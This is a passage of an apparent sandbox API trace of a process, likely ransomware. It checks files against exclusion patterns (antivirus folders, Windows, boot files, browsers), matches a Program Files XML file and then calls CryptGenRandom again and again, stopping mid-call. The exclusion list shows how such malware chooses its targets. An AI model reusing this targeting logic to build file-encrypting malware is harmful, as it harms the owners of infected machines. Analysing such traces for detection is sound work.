(pszFile="osknumpadbase.xml", pszSpec="*\\winrar\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\java\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\windows\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\ESET\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\AVG\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*Atheros*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*Realtek*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*bootmgr*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*boot*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*boot*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*IO.SYS*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*ntldr*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*chrome*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*opera*") returned 0 [0158.492] PathMatchSpecW (pszFile="osknumpadbase.xml", pszSpec="*firefox*") returned 0 [0158.492] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", pszSpec="*") returned 1 [0158.492] strlen (_Str="NMoreira") returned 0x8 [0158.492] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.492] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.492] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.492] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.492] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.493] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.494] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.495] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.496] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 